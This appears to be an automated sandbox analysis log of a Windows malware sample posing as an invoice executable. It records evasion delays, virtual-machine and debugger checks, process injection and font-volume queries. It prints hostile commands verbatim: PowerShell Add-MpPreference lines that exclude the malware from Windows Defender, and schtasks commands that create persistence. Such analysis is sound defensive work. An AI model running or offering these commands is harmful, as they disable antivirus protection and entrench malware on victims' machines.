Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99651
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99282
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99157
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 99032
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98918
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98813
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98688
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98563
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98438
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98313
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98203
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 98094
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97969
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97860
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97735
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97610
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97485
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97360
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97235
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 97110
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96985
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96860
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96735
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96610
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96485
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96360
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96235
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 96086
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179770
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179641
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179531
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179422
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179313
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179188
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 179063

Source: cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Code function: 8_2_027D7EE8 CheckRemoteDebuggerPresent,

8_2_027D7EE8

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Memory written: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
